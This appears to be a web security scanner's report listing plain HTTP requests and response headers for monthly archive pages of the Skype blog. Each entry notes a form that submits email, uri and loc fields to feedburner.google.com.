GET /en/2007/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:25 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 165110 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:24 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 228535 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:23 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 107509 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:22 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 262371 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:20 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 204711 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:19 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 170679 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:17 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 617800 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:15 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 111695 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:14 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 134252 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:13 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 137689 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:12 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 125026 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:11 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 106907 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:10 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 126075 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:09 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 216000 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:07 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 87142 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:06 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 351318 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:05 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 138815 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:04 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 364699 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:02 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 132877 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:01 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 248998 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:00 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 135760 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/12/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:59 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 161922 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:57 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 105287 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:57 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 308499 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:55 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 527797 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:53 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 87373 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:52 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 111632 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:51 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 203279 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:50 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 125776 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:49 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 204408 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:47 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 163021 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:46 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 100515 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:45 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 183138 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/12/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:44 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 183916 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:43 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 182044 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:41 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 332415 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:39 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 292276 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:38 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 249793 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:36 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 363177 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:35 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 437288 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:33 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 585263 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:31 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 118021 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:30 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 242894 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:29 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 485845 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:27 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 545285 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/12/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:25 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 414773 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:53 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 485169 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:51 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 128365 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
